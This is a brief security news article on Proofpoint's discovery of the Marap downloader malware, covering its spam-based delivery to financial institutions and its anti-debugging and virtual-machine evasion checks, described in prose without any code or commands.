Security researchers have discovered a new strain of malware named Marap targeting financial sectors
Security researchers have discovered a new strain of malware named Marap targeting financial sectors.Researchers from Proofpoint discovered the malware and said that malware is distributed through massive spam email campaigns containing malicious attachments (Malspam).The Marap malware is capable of downloading other modules and payload to the infected system.“Proofpoint researchers recently discovered a new downloader malware in a fairly large campaign (millions of messages) primarily targeting financial institutions. The malware, dubbed “Marap” (“param” backward), is notable for its focused functionality that includes the ability to download other modules and payloads. The modular nature allows actors to add new capabilities as they become available or download additional modules post infection. To date, we have observed it download a system fingerprinting module that performs simple reconnaissance.”
Marap malware analysis
The spam emails appears to be coming from the sales department, an important document from the bank or invoice and contain various type of attachment such as- Microsoft Excel Web Query (“.iqy”) files
- Password-protected ZIP archives containing “.iqy” files
- PDF documents with embedded “.iqy” files
- Microsoft Word documents containing macros
- The first anti-analysis features of Marap malware is that Most of the Windows API function calls are resolved at runtime using a hashing algorithm, but in Marap the algorithm appears to be custom.
- The second features malware uses timing checks at the beginning of important functions which can avoid debugging and sandboxing of the malware. The malware exists if the calculated time is too short.
- The malware compares the system’s MAC address to a list of virtual machine vendors, and if a virtual is detected and a configuration flag is set, the malware may exit.
You may be interested in reading: New Necurs Botnet Phishing Campaign Target Banks